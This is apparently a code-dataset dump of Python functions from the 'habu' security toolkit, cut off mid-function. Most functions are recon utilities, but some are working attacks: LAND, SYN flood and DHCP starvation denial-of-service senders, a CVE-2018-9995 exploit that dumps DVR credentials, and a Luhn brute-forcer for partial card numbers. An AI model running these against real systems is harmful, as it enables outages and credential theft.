_id
stringlengths
2
7
title
stringlengths
1
88
partition
stringclasses
3 values
text
stringlengths
75
19.8k
language
stringclasses
1 value
meta_information
dict
q29700
get_options
train
def get_options(server): """Retrieve the available HTTP verbs""" try: response = requests.options( server, allow_redirects=False, verify=False, timeout=5) except (requests.exceptions.ConnectionError, requests.exceptions.MissingSchema): return "Server {} is not available!".format(server) try: return {'allowed': response.headers['Allow']} except KeyError: return "Unable to get HTTP methods"
python
{ "resource": "" }
q29701
cmd_ping
train
def cmd_ping(ip, interface, count, timeout, wait, verbose): """The classic ping tool that send ICMP echo requests. \b # habu.ping 8.8.8.8 IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding """ if interface: conf.iface = interface conf.verb = False conf.L3socket=L3RawSocket layer3 = IP() layer3.dst = ip layer3.tos = 0 layer3.id = 1 layer3.flags = 0 layer3.frag = 0 layer3.ttl = 64 layer3.proto = 1 # icmp layer4 = ICMP() layer4.type = 8 # echo-request layer4.code = 0 layer4.id = 0 layer4.seq = 0 pkt = layer3 / layer4 counter = 0 while True: ans = sr1(pkt, timeout=timeout) if ans: if verbose: ans.show() else: print(ans.summary()) del(ans) else: print('Timeout') counter += 1 if count != 0 and counter == count: break sleep(wait) return True
python
{ "resource": "" }
q29702
cmd_host
train
def cmd_host(verbose): """Collect information about the host where habu is running. Example: \b $ habu.host { "kernel": [ "Linux", "demo123", "5.0.6-200.fc29.x86_64", "#1 SMP Wed Apr 3 15:09:51 UTC 2019", "x86_64", "x86_64" ], "distribution": [ "Fedora", "29", "Twenty Nine" ], "libc": [ "glibc", "2.2.5" ], "arch": "x86_64", "python_version": "3.7.3", "os_name": "Linux", "cpu": "x86_64", "static_hostname": "demo123", "fqdn": "demo123.lab.sierra" } """ if verbose: logging.basicConfig(level=logging.INFO, format='%(message)s') print("Gather information about the host...", file=sys.stderr) result = gather_details() if result: print(json.dumps(result, indent=4)) else: print("[X] Unable to gather information") return True
python
{ "resource": "" }
q29703
cmd_extract_hostname
train
def cmd_extract_hostname(infile, check, verbose, jsonout): """Extract hostnames from a file or stdin. Example: \b $ cat /var/log/some.log | habu.extract.hostname www.google.com ibm.com fileserver.redhat.com """ if verbose: logging.basicConfig(level=logging.INFO, format='%(message)s') data = infile.read() result = extract_hostname(data) if check: logging.info('Checking against DNS...') for candidate in result: try: socket.getaddrinfo(candidate, None) except socket.gaierror: result.remove(candidate) if jsonout: print(json.dumps(result, indent=4)) else: print('\n'.join(result))
python
{ "resource": "" }
q29704
cmd_b64
train
def cmd_b64(f, do_decode): """ Encodes or decode data in base64, just like the command base64. \b $ echo awesome | habu.b64 YXdlc29tZQo= \b $ echo YXdlc29tZQo= | habu.b64 -d awesome """ data = f.read() if not data: print("Empty file or string!") return 1 if do_decode: os.write(sys.stdout.fileno(), base64.b64decode(data)) else: os.write(sys.stdout.fileno(), base64.b64encode(data))
python
{ "resource": "" }
q29705
cmd_shodan
train
def cmd_shodan(ip, no_cache, verbose, output): """Simple shodan API client. Prints the JSON result of a shodan query. Example: \b $ habu.shodan 8.8.8.8 { "hostnames": [ "google-public-dns-a.google.com" ], "country_code": "US", "org": "Google", "data": [ { "isp": "Google", "transport": "udp", "data": "Recursion: enabled", "asn": "AS15169", "port": 53, "hostnames": [ "google-public-dns-a.google.com" ] } ], "ports": [ 53 ] } """ habucfg = loadcfg() if 'SHODAN_APIKEY' not in habucfg: print('You must provide a shodan apikey. Use the ~/.habu.json file (variable SHODAN_APIKEY), or export the variable HABU_SHODAN_APIKEY') print('Get your API key from https://www.shodan.io/') sys.exit(1) if verbose: logging.basicConfig(level=logging.INFO, format='%(message)s') data = shodan_get_result(ip, habucfg['SHODAN_APIKEY'], no_cache, verbose) output.write(json.dumps(data, indent=4)) output.write('\n')
python
{ "resource": "" }
q29706
cmd_hasher
train
def cmd_hasher(f, algorithm): """Compute various hashes for the input data, that can be a file or a stream. Example: \b $ habu.hasher README.rst md5 992a833cd162047daaa6a236b8ac15ae README.rst ripemd160 0566f9141e65e57cae93e0e3b70d1d8c2ccb0623 README.rst sha1 d7dbfd2c5e2828eb22f776550c826e4166526253 README.rst sha256 6bb22d927e1b6307ced616821a1877b6cc35e... README.rst sha512 8743f3eb12a11cf3edcc16e400fb14d599b4a... README.rst whirlpool 96bcc083242e796992c0f3462f330811f9e8c... README.rst You can also specify which algorithm to use. In such case, the output is only the value of the calculated hash: \b $ habu.hasher -a md5 README.rst 992a833cd162047daaa6a236b8ac15ae README.rst """ data = f.read() if not data: print("Empty file or string!") return 1 if algorithm: print(hasher(data, algorithm)[algorithm], f.name) else: for algo, result in hasher(data).items(): print("{:<12} {} {}".format(algo, result, f.name))
python
{ "resource": "" }
q29707
cmd_tcpflags
train
def cmd_tcpflags(ip, port, flags, rflags, verbose): """Send TCP packets with different flags and tell what responses receives. It can be used to analyze how the different TCP/IP stack implementations and configurations responds to packet with various flag combinations. Example: \b # habu.tcpflags www.portantier.com S -> SA FS -> SA FA -> R SA -> R By default, the command sends all possible flag combinations. You can specify which flags must ever be present (reducing the quantity of possible combinations), with the option '-f'. Also, you can specify which flags you want to be present on the response packets to show, with the option '-r'. With the next command, you see all the possible combinations that have the FIN (F) flag set and generates a response that contains the RST (R) flag. Example: \b # habu.tcpflags -f F -r R www.portantier.com FPA -> R FSPA -> R FAU -> R """ conf.verb = False pkts = IP(dst=ip) / TCP(flags=(0, 255), dport=port) out = "{:>8} -> {:<8}" for pkt in pkts: if not flags or all(i in pkt.sprintf(r"%TCP.flags%") for i in flags): ans = sr1(pkt, timeout=0.2) if ans: if not rflags or all(i in ans.sprintf(r"%TCP.flags%") for i in rflags): print(out.format(pkt.sprintf(r"%TCP.flags%"), ans.sprintf(r"%TCP.flags%"))) return True
python
{ "resource": "" }
q29708
cmd_land
train
def cmd_land(ip, count, port, iface, verbose): """This command implements the LAND attack, that sends packets forging the source IP address to be the same that the destination IP. Also uses the same source and destination port. The attack is very old, and can be used to make a Denial of Service on old systems, like Windows NT 4.0. More information here: https://en.wikipedia.org/wiki/LAND \b # sudo habu.land 172.16.0.10 ............ Note: Each dot (.) is a sent packet. You can specify how many packets send with the '-c' option. The default is never stop. Also, you can specify the destination port, with the '-p' option. """ conf.verb = False if iface: conf.iface = iface layer3 = IP() layer3.dst = ip layer3.src = ip layer4 = TCP() layer4.dport = port layer4.sport = port pkt = layer3 / layer4 counter = 0 while True: send(pkt) counter += 1 if verbose: print(pkt.summary()) else: print('.', end='') sys.stdout.flush() if count != 0 and counter == count: break return True
python
{ "resource": "" }
q29709
query_bulk
train
def query_bulk(names): """Query server with multiple entries.""" answers = [__threaded_query(name) for name in names] while True: if all([a.done() for a in answers]): break sleep(1) return [answer.result() for answer in answers]
python
{ "resource": "" }
q29710
lookup_reverse
train
def lookup_reverse(ip_address): """Perform a reverse lookup of IP address.""" try: type(ipaddress.ip_address(ip_address)) except ValueError: return {} record = reversename.from_address(ip_address) hostname = str(resolver.query(record, "PTR")[0])[:-1] return {'hostname': hostname}
python
{ "resource": "" }
q29711
lookup_forward
train
def lookup_forward(name): """Perform a forward lookup of a hostname.""" ip_addresses = {} addresses = list(set(str(ip[4][0]) for ip in socket.getaddrinfo( name, None))) if addresses is None: return ip_addresses for address in addresses: if type(ipaddress.ip_address(address)) is ipaddress.IPv4Address: ip_addresses['ipv4'] = address if type(ipaddress.ip_address(address)) is ipaddress.IPv6Address: ip_addresses['ipv6'] = address return ip_addresses
python
{ "resource": "" }
q29712
cmd_crtsh
train
def cmd_crtsh(domain, no_cache, no_validate, verbose): """Downloads the certificate transparency logs for a domain and check with DNS queries if each subdomain exists. Uses multithreading to improve the performance of the DNS queries. Example: \b $ sudo habu.crtsh securetia.com [ "karma.securetia.com.", "www.securetia.com." ] """ if verbose: logging.basicConfig(level=logging.INFO, format='%(message)s') if not no_cache: homedir = pwd.getpwuid(os.getuid()).pw_dir requests_cache.install_cache(homedir + '/.habu_requests_cache', expire_after=3600) subdomains = set() if verbose: print("Downloading subdomain list from https://crt.sh ...", file=sys.stderr) req = requests.get("https://crt.sh/?q=%.{d}&output=json".format(d=domain)) if req.status_code != 200: print("[X] Information not available!") exit(1) json_data = json.loads(req.text) for data in json_data: name = data['name_value'].lower() if '*' not in name: subdomains.add(name) subdomains = list(subdomains) if no_validate: print(json.dumps(sorted(subdomains), indent=4)) return True if verbose: print("Validating subdomains against DNS servers ...", file=sys.stderr) answers = query_bulk(subdomains) validated = [] for answer in answers: if answer: validated.append(str(answer.qname)) print(json.dumps(sorted(validated), indent=4)) return True
python
{ "resource": "" }
q29713
cmd_dns_lookup_forward
train
def cmd_dns_lookup_forward(hostname, verbose): """Perform a forward lookup of a given hostname. Example: \b $ habu.dns.lookup.forward google.com { "ipv4": "172.217.168.46", "ipv6": "2a00:1450:400a:802::200e" } """ if verbose: logging.basicConfig(level=logging.INFO, format='%(message)s') print("Looking up %s..." % hostname, file=sys.stderr) answer = lookup_forward(hostname) print(json.dumps(answer, indent=4)) return True
python
{ "resource": "" }
q29714
cmd_cve_2018_9995
train
def cmd_cve_2018_9995(ip, port, verbose): """Exploit the CVE-2018-9995 vulnerability, present on various DVR systems. Note: Based on the original code from Ezequiel Fernandez (@capitan_alfa). Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9995 Example: \b $ python habu.cve.2018-9995 82.202.102.42 [ { "uid": "admin", "pwd": "securepassword", "role": 2, "enmac": 0, "mac": "00:00:00:00:00:00", "playback": 4294967295, "view": 4294967295, "rview": 4294967295, "ptz": 4294967295, "backup": 4294967295, "opt": 4294967295 } ] """ url = 'http://' + ip + ':' + str(port) fullhost = url + '/device.rsp?opt=user&cmd=list' headers = { 'Host': ip, 'User-Agent': 'Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Languag': 'es-AR,en-US;q=0.7,en;q=0.3', 'Connection': 'close', 'Content-Type': 'text/html', 'Cookie': 'uid=admin', } try: r = requests.get(fullhost, headers=headers,timeout=10) except Exception as e: print('Exception:', e) sys.exit(1) try: data = r.json() except Exception as e: print('Exception:', e) sys.exit(1) print(json.dumps(data["list"], indent=4))
python
{ "resource": "" }
q29715
Command.pid
train
def pid(self): """The process' PID.""" # Support for pexpect's functionality. if hasattr(self.subprocess, 'proc'): return self.subprocess.proc.pid # Standard subprocess method. return self.subprocess.pid
python
{ "resource": "" }
q29716
Command.run
train
def run(self, block=True, binary=False, cwd=None): """Runs the given command, with or without pexpect functionality enabled.""" self.blocking = block # Use subprocess. if self.blocking: popen_kwargs = self._default_popen_kwargs.copy() popen_kwargs['universal_newlines'] = not binary if cwd: popen_kwargs['cwd'] = cwd s = subprocess.Popen(self._popen_args, **popen_kwargs) # Otherwise, use pexpect. else: pexpect_kwargs = self._default_pexpect_kwargs.copy() if binary: pexpect_kwargs['encoding'] = None if cwd: pexpect_kwargs['cwd'] = cwd # Enable Python subprocesses to work with expect functionality. pexpect_kwargs['env']['PYTHONUNBUFFERED'] = '1' s = PopenSpawn(self._popen_args, **pexpect_kwargs) self.subprocess = s self.was_run = True
python
{ "resource": "" }
q29717
Command.send
train
def send(self, s, end=os.linesep, signal=False): """Sends the given string or signal to std_in.""" if self.blocking: raise RuntimeError('send can only be used on non-blocking commands.') if not signal: if self._uses_subprocess: return self.subprocess.communicate(s + end) else: return self.subprocess.send(s + end) else: self.subprocess.send_signal(s)
python
{ "resource": "" }
q29718
cmd_arp_sniff
train
def cmd_arp_sniff(iface): """Listen for ARP packets and show information for each device. Columns: Seconds from last packet | IP | MAC | Vendor Example: \b 1 192.168.0.1 a4:08:f5:19:17:a4 Sagemcom Broadband SAS 7 192.168.0.2 64:bc:0c:33:e5:57 LG Electronics (Mobile Communications) 2 192.168.0.5 00:c2:c6:30:2c:58 Intel Corporate 6 192.168.0.7 54:f2:01:db:35:58 Samsung Electronics Co.,Ltd """ conf.verb = False if iface: conf.iface = iface print("Waiting for ARP packets...", file=sys.stderr) sniff(filter="arp", store=False, prn=procpkt)
python
{ "resource": "" }
q29719
cmd_web_tech
train
def cmd_web_tech(url, no_cache, verbose): """Use Wappalyzer apps.json database to identify technologies used on a web application. Reference: https://github.com/AliasIO/Wappalyzer Note: This tool only sends one request. So, it's stealth and not suspicious. \b $ habu.web.tech https://woocomerce.com { "Nginx": { "categories": [ "Web Servers" ] }, "PHP": { "categories": [ "Programming Languages" ] }, "WooCommerce": { "categories": [ "Ecommerce" ], "version": "6.3.1" }, "WordPress": { "categories": [ "CMS", "Blogs" ] }, } """ response = web_tech(url, no_cache, verbose) print(json.dumps(response, indent=4))
python
{ "resource": "" }
q29720
cmd_tcpscan
train
def cmd_tcpscan(ip, port, iface, flags, sleeptime, timeout, show_all, verbose): """TCP Port Scanner. Print the ports that generated a response with the SYN flag or (if show use -a) all the ports that generated a response. It's really basic compared with nmap, but who is comparing? Example: \b # habu.tcpscan -p 22,23,80,443 -s 1 45.77.113.133 22 S -> SA 80 S -> SA 443 S -> SA """ if verbose: logging.basicConfig(level=logging.INFO, format='%(message)s') conf.verb = False if iface: conf.iface = iface port_regex = r'^[0-9,-]+$' if not re.match(port_regex, port): logging.critical("Invalid port specification") return False ports = [] for p in str(port).split(','): if '-' in p: first, last = p.split('-') for n in range(int(first), int(last)+1): ports.append(n) else: ports.append(int(p)) out = "{port} {sflags} -> {rflags}" pkts = IP(dst=ip)/TCP(flags=flags, dport=ports) if sleeptime: res = [] for pkt in pkts: logging.info(pkt.summary()) _ = sr1(pkt) if _: logging.info(_.summary()) res.append((pkt, _)) else: res, unans = sr(pkts, verbose=verbose) for s,r in res: if show_all or 'S' in r.sprintf(r"%TCP.flags%"): print(out.format( port=s[TCP].dport, sflags=s.sprintf(r"%TCP.flags%"), rflags=r.sprintf(r"%TCP.flags%") ))
python
{ "resource": "" }
q29721
cmd_dns_lookup_reverse
train
def cmd_dns_lookup_reverse(ip_address, verbose): """Perform a reverse lookup of a given IP address. Example: \b $ $ habu.dns.lookup.reverse 8.8.8.8 { "hostname": "google-public-dns-a.google.com" } """ if verbose: logging.basicConfig(level=logging.INFO, format='%(message)s') print("Looking up %s..." % ip_address, file=sys.stderr) answer = lookup_reverse(ip_address) if answer: print(json.dumps(answer, indent=4)) else: print("[X] %s is not valid IPv4/IPV6 address" % ip_address) return True
python
{ "resource": "" }
q29722
cmd_crack_luhn
train
def cmd_crack_luhn(number): """Having known values for a Luhn validated number, obtain the possible unknown numbers. Numbers that use the Luhn algorithm for validation are Credit Cards, IMEI, National Provider Identifier in the United States, Canadian Social Insurance Numbers, Israel ID Numbers and Greek Social Security Numbers (ΑΜΚΑ). The '-' characters are ignored. Define the missing numbers with the 'x' character. Reference: https://en.wikipedia.org/wiki/Luhn_algorithm Example: \b $ habu.crack.luhn 4509-xxxx-3160-6445 """ number = number.replace('-', '') unknown_count = number.count('x') if not number.replace('x', '').isdigit(): print('Invalid format. Please, read the documentation.', file=sys.stderr) sys.exit(1) for n in range(10 ** unknown_count): candidate = number for item in '{:0{count}}'.format(n, count=unknown_count): candidate = candidate.replace('x', item, 1) if luhn_validate(candidate): print(candidate)
python
{ "resource": "" }
q29723
cmd_protoscan
train
def cmd_protoscan(ip, iface, timeout, all_protocols, verbose): """ Send IP packets with different protocol field content to guess what layer 4 protocols are available. The output shows which protocols doesn't generate a 'protocol-unreachable' ICMP response. Example: \b $ sudo python cmd_ipscan.py 45.77.113.133 1 icmp 2 igmp 4 ipencap 6 tcp 17 udp 41 ipv6 47 gre 50 esp 51 ah 58 ipv6_icmp 97 etherip 112 vrrp 115 l2tp 132 sctp 137 mpls_in_ip """ if verbose: logging.basicConfig(level=logging.INFO, format='%(message)s') conf.verb = False if iface: conf.iface = iface if all_protocols: protocols = (0,255) else: # convert "{name:num}" to {num:name}" protocols = { num:name for name,num in conf.protocols.__dict__.items() if isinstance(num, int) } ans,unans=sr(IP(dst=ip, proto=protocols.keys())/"SCAPY", retry=0, timeout=timeout, verbose=verbose) allowed_protocols = [ pkt['IP'].proto for pkt in unans ] for proto in sorted(allowed_protocols): print('{:<4} {}'.format(proto, protocols[proto]))
python
{ "resource": "" }
q29724
cmd_http_options
train
def cmd_http_options(server, verbose): """Retrieve the available HTTP methods of a web server. Example: \b $ habu.http.options -v http://google.com { "allowed": "GET, HEAD" } """ if verbose: logging.basicConfig(level=logging.INFO, format='%(message)s') if verbose: print("[-] Retrieving the HTTP headers of the server...") options = get_options(server) if type(options) is dict: print(json.dumps(options, indent=4)) if verbose: print("[+] HTTP options from {} retrieved".format(server)) else: print("[X] {}".format(options), file=sys.stderr) return True
python
{ "resource": "" }
q29725
cmd_arp_ping
train
def cmd_arp_ping(ip, iface, verbose): """ Send ARP packets to check if a host it's alive in the local network. Example: \b # habu.arp.ping 192.168.0.1 Ether / ARP is at a4:08:f5:19:17:a4 says 192.168.0.1 / Padding """ if verbose: logging.basicConfig(level=logging.INFO, format='%(message)s') conf.verb = False if iface: conf.iface = iface res, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=2) for _, pkt in res: if verbose: print(pkt.show()) else: print(pkt.summary())
python
{ "resource": "" }
q29726
cmd_dhcp_starvation
train
def cmd_dhcp_starvation(iface, timeout, sleeptime, verbose): """Send multiple DHCP requests from forged MAC addresses to fill the DHCP server leases. When all the available network addresses are assigned, the DHCP server don't send responses. So, some attacks, like DHCP spoofing, can be made. \b # habu.dhcp_starvation Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.6:bootpc / BOOTP / DHCP Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.7:bootpc / BOOTP / DHCP Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.8:bootpc / BOOTP / DHCP """ conf.verb = False if iface: conf.iface = iface conf.checkIPaddr = False ether = Ether(dst="ff:ff:ff:ff:ff:ff") ip = IP(src="0.0.0.0",dst="255.255.255.255") udp = UDP(sport=68, dport=67) dhcp = DHCP(options=[("message-type","discover"),"end"]) while True: bootp = BOOTP(chaddr=str(RandMAC())) dhcp_discover = ether / ip / udp / bootp / dhcp ans, unans = srp(dhcp_discover, timeout=1) # Press CTRL-C after several seconds for _, pkt in ans: if verbose: print(pkt.show()) else: print(pkt.sprintf(r"%IP.src% offers %BOOTP.yiaddr%")) sleep(sleeptime)
python
{ "resource": "" }
q29727
cmd_http_headers
train
def cmd_http_headers(server, verbose): """Retrieve the HTTP headers of a web server. Example: \b $ habu.http.headers http://duckduckgo.com { "Server": "nginx", "Date": "Sun, 14 Apr 2019 00:00:55 GMT", "Content-Type": "text/html", "Content-Length": "178", "Connection": "keep-alive", "Location": "https://duckduckgo.com/", "X-Frame-Options": "SAMEORIGIN", "Content-Security-Policy": "default-src https: blob: data: 'unsafe-inline' 'unsafe-eval'", "X-XSS-Protection": "1;mode=block", "X-Content-Type-Options": "nosniff", "Referrer-Policy": "origin", "Expect-CT": "max-age=0", "Expires": "Mon, 13 Apr 2020 00:00:55 GMT", "Cache-Control": "max-age=31536000" } """ if verbose: logging.basicConfig(level=logging.INFO, format='%(message)s') if verbose: print("[-] Retrieving the HTTP headers of the server...") headers = get_headers(server) if headers is not False: print(json.dumps(headers, indent=4)) else: print("[X] URL {} is not valid!", file=sys.stderr) if verbose: print("[+] HTTP headers from {} retrieved".format(server)) return True
python
{ "resource": "" }
q29728
cmd_fernet
train
def cmd_fernet(key, decrypt, ttl, i, o): """Fernet cipher. Uses AES-128-CBC with HMAC Note: You must use a key to cipher with Fernet. Use the -k paramenter or set the FERNET_KEY configuration value. The keys can be generated with the command habu.fernet.genkey Reference: https://github.com/fernet/spec/blob/master/Spec.md Example: \b $ "I want to protect this string" | habu.fernet gAAAAABbXnCGoCULLuVNRElYTbEcwnek9iq5jBKq9JAN3wiiBUzPqpUgV5oWvnC6xfIA... \b $ echo gAAAAABbXnCGoCULLuVNRElYTbEcwnek9iq5jBKq9JAN3wiiBUzPqpUgV5oWvnC6xfIA... | habu.fernet -d I want to protect this string """ habucfg = loadcfg() if not key: if 'FERNET_KEY' in habucfg: key = habucfg['FERNET_KEY'] else: print(ERROR_NOKEY, file=sys.stderr) sys.exit(1) if not ttl: ttl=None cipher = Fernet(key) data = i.read() if decrypt: try: token = cipher.decrypt(data, ttl) except Exception as e: print("Error decrypting", file=sys.stderr) sys.exit(1) else: token = cipher.encrypt(data) print(token.decode(), end='')
python
{ "resource": "" }
q29729
cmd_isn
train
def cmd_isn(ip, port, count, iface, graph, verbose): """Create TCP connections and print the TCP initial sequence numbers for each one. \b $ sudo habu.isn -c 5 www.portantier.com 1962287220 1800895007 589617930 3393793979 469428558 Note: You can get a graphical representation (needs the matplotlib package) using the '-g' option to better understand the randomness. """ conf.verb = False if iface: conf.iface = iface isn_values = [] for _ in range(count): pkt = IP(dst=ip)/TCP(sport=RandShort(), dport=port, flags="S") ans = sr1(pkt, timeout=0.5) if ans: send(IP(dst=ip)/TCP(sport=pkt[TCP].sport, dport=port, ack=ans[TCP].seq + 1, flags='A')) isn_values.append(ans[TCP].seq) if verbose: ans.show2() if graph: try: import matplotlib.pyplot as plt except ImportError: print("To graph support, install matplotlib") return 1 plt.plot(range(len(isn_values)), isn_values, 'ro') plt.show() else: for v in isn_values: print(v) return True
python
{ "resource": "" }
q29730
cmd_traceroute
train
def cmd_traceroute(ip, port, iface): """TCP traceroute. Identify the path to a destination getting the ttl-zero-during-transit messages. Note: On the internet, you can have various valid paths to a device. Example: \b # habu.traceroute 45.77.113.133 IP / ICMP 192.168.0.1 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror IP / ICMP 10.242.4.197 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror / Padding IP / ICMP 200.32.127.98 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror / Padding . IP / ICMP 4.16.180.190 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror . IP / TCP 45.77.113.133:http > 192.168.0.5:ftp_data SA / Padding Note: It's better if you use a port that is open on the remote system. """ conf.verb = False if iface: conf.iface = iface pkts = IP(dst=ip, ttl=(1, 16)) / TCP(dport=port) for pkt in pkts: ans = sr1(pkt, timeout=1, iface=conf.iface) if not ans: print('.') continue print(ans.summary()) if TCP in ans and ans[TCP].flags == 18: break return True
python
{ "resource": "" }
q29731
web_screenshot
train
def web_screenshot(url, outfile, browser=None): """Create a screenshot of a website.""" valid_browsers = ['firefox', 'chromium-browser'] available_browsers = [ b for b in valid_browsers if which(b) ] if not available_browsers: print("You don't have firefox or chromium-browser in your PATH".format(browser), file=sys.stderr) return False if not browser: browser = available_browsers[0] if browser not in available_browsers: print("You don't have {} in your PATH".format(browser), file=sys.stderr) return False #screenshot_cmd = '' #profile_firefox = shlex.split('firefox --new-instance --CreateProfile habu.web.screenshot') #screenshot_firefox = shlex.split('firefox --new-instance --headless -P habu.web.screenshot --screenshot {} {}'.format(outfile, url)) #screenshot_chromium = shlex.split('chromium-browser --headless --disable-gpu --window-size=1440,900 --screenshot={} {}'.format(outfile, url)) if browser == 'firefox': profile_firefox = shlex.split('firefox --new-instance --CreateProfile habu.web.screenshot') subprocess.Popen(profile_firefox, stderr=subprocess.DEVNULL) screenshot_cmd = shlex.split('firefox --new-instance --headless -P habu.web.screenshot --screenshot {} {}'.format(outfile, url)) if browser == 'chromium-browser': screenshot_cmd = shlex.split('chromium-browser --headless --disable-gpu --window-size=1440,900 --screenshot={} {}'.format(outfile, url)) outfile = Path(outfile) if outfile.is_file(): outfile.unlink() with subprocess.Popen(screenshot_cmd, stderr=subprocess.DEVNULL) as proc: for count in range(DURATION): sleep(1) if outfile.is_file(): break if count == DURATION - 1: print("Unable to create screenshot", file=sys.stderr) break proc.kill() return True
python
{ "resource": "" }
q29732
cmd_config_set
train
def cmd_config_set(key, value): """Set VALUE to the config KEY. Note: By default, KEY is converted to uppercase. Example: \b $ habu.config.set DNS_SERVER 8.8.8.8 """ habucfg = loadcfg(environment=False) habucfg[key.upper()] = value with Path('~/.habu.json').expanduser().open('w') as f: f.write(json.dumps(habucfg, indent=4, sort_keys=True))
python
{ "resource": "" }
q29733
cmd_cymon_ip_timeline
train
def cmd_cymon_ip_timeline(ip, no_cache, verbose, output, pretty): """Simple cymon API client. Prints the JSON result of a cymon IP timeline query. Example: \b $ habu.cymon.ip.timeline 8.8.8.8 { "timeline": [ { "time_label": "Aug. 18, 2018", "events": [ { "description": "Posted: 2018-08-18 23:37:39 CEST IDS Alerts: 0 URLQuery Alerts: 1 ...", "created": "2018-08-18T21:39:07Z", "title": "Malicious activity reported by urlquery.net", "details_url": "http://urlquery.net/report/b1393866-9b1f-4a8e-b02b-9636989050f3", "tag": "malicious activity" } ] }, ... """ habucfg = loadcfg() if 'CYMON_APIKEY' not in habucfg: print('You must provide a cymon apikey. Use the ~/.habu.json file (variable CYMON_APIKEY), or export the variable HABU_CYMON_APIKEY') print('Get your API key from https://www.cymon.io/') sys.exit(1) if verbose: logging.basicConfig(level=logging.INFO, format='%(message)s') if not no_cache: homedir = pwd.getpwuid(os.getuid()).pw_dir requests_cache.install_cache(homedir + '/.habu_requests_cache') url = 'https://www.cymon.io:443/api/nexus/v1/ip/{}/timeline/'.format(ip) headers = { 'Authorization': 'Token {}'.format(habucfg['CYMON_APIKEY']) } r = requests.get(url, headers=headers) if r.status_code not in [200, 404]: print('ERROR', r) return False if r.status_code == 404: print("Not Found") return False data = r.json() if pretty: output.write(pretty_print(data)) else: output.write(json.dumps(data, indent=4)) output.write('\n')
python
{ "resource": "" }
q29734
gather_details
train
def gather_details(): """Get details about the host that is executing habu.""" try: data = { 'kernel': platform.uname(), 'distribution': platform.linux_distribution(), 'libc': platform.libc_ver(), 'arch': platform.machine(), 'python_version': platform.python_version(), 'os_name': platform.system(), 'static_hostname': platform.node(), 'cpu': platform.processor(), 'fqdn': socket.getfqdn(), } except AttributeError: return {} return data
python
{ "resource": "" }
q29735
get_internal_ip
train
def get_internal_ip(): """Get the local IP addresses.""" nics = {} for interface_name in interfaces(): addresses = ifaddresses(interface_name) try: nics[interface_name] = { 'ipv4': addresses[AF_INET], 'link_layer': addresses[AF_LINK], 'ipv6': addresses[AF_INET6], } except KeyError: pass return nics
python
{ "resource": "" }
q29736
geo_location
train
def geo_location(ip_address): """Get the Geolocation of an IP address.""" try: type(ipaddress.ip_address(ip_address)) except ValueError: return {} data = requests.get( 'https://ipapi.co/{}/json/'.format(ip_address), timeout=5).json() return data
python
{ "resource": "" }
q29737
cmd_nmap_ports
train
def cmd_nmap_ports(scanfile, protocol): """Read an nmap report and print the tested ports. Print the ports that has been tested reading the generated nmap output. You can use it to rapidly reutilize the port list for the input of other tools. Supports and detects the 3 output formats (nmap, gnmap and xml) Example: \b # habu.nmap.ports portantier.nmap 21,22,23,80,443 """ data = scanfile.read() fmt = detect_format(data) if fmt not in ['xml', 'nmap', 'gnmap']: print('Unknown file format.', file=sys.stdout) return 1 if fmt == 'nmap': result = parse_format_nmap(data, protocol) elif fmt == 'gnmap': result = parse_format_gnmap(data, protocol) elif fmt == 'xml': result = parse_format_xml(data, protocol) print(result, end='') return True
python
{ "resource": "" }
q29738
cmd_web_report
train
def cmd_web_report(input_file, verbose, browser): """Uses Firefox or Chromium to take a screenshot of the websites. Makes a report that includes the HTTP headers. The expected format is one url per line. Creates a directory called 'report' with the content inside. \b $ echo https://www.portantier.com | habu.web.report """ urls = input_file.read().decode().strip().split('\n') report_dir = Path('report') try: report_dir.mkdir() except Exception: pass report_file = report_dir / 'index.html' with report_file.open('w') as outfile: outfile.write('<!doctype html>\n') outfile.write('<html lang=en-us>\n') outfile.write('<meta charset=utf-8>\n') outfile.write('<title>habu.web.report</title>\n') outfile.write('<body>\n') outfile.write('<table border=1 style="max-width: 100%">\n') for i,url in enumerate(sorted(urls)): error = False print(i, url, file=sys.stderr) outfile.write('<tr>\n') outfile.write('<td style="vertical-align:top;max-width:30%">\n') outfile.write('<p><strong>' + html.escape(url) + '</strong></p>\n') try: req = urllib.request.Request(url, method='HEAD') resp = urllib.request.urlopen(req) outfile.write('<pre style="white-space: pre-wrap;">' + html.escape(str(resp.headers)) + '</pre>\n') except Exception as e: outfile.write('<pre>ERROR: ' + html.escape(str(e)) + '</pre>\n') error = True outfile.write('</td><td>') if not error: web_screenshot(url, report_dir / '{}.png'.format(i), browser=browser) outfile.write('<img src={}.png style="max-width: 100%" />\n'.format(i)) outfile.write('</td>\n') outfile.write('</tr>\n') outfile.write('</table>\n') outfile.write('</body>\n') outfile.write('</html>\n')
python
{ "resource": "" }
q29739
cmd_synflood
train
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose): """Launch a lot of TCP connections and keeps them opened. Some very old systems can suffer a Denial of Service with this. Reference: https://en.wikipedia.org/wiki/SYN_flood Example: \b # sudo habu.synflood 172.16.0.10 ................. Each dot is a packet sent. You can use the options '-2' and '-3' to forge the layer 2/3 addresses. If you use them, each connection will be sent from a random layer2 (MAC) and/or layer3 (IP) address. You can choose the number of connections to create with the option '-c'. The default is never stop creating connections. Note: If you send the packets from your real IP address and you want to keep the connections half-open, you need to setup for firewall to don't send the RST packets. """ conf.verb = False if interface: conf.iface = interface layer2 = Ether() layer3 = IP() layer3.dst = ip layer4 = TCP() layer4.dport = port pkt = layer2 / layer3 / layer4 counter = 0 print("Please, remember to block your RST responses", file=sys.stderr) while True: if forgeip: pkt[IP].src = "%s.%s" %(pkt[IP].src.rsplit('.', 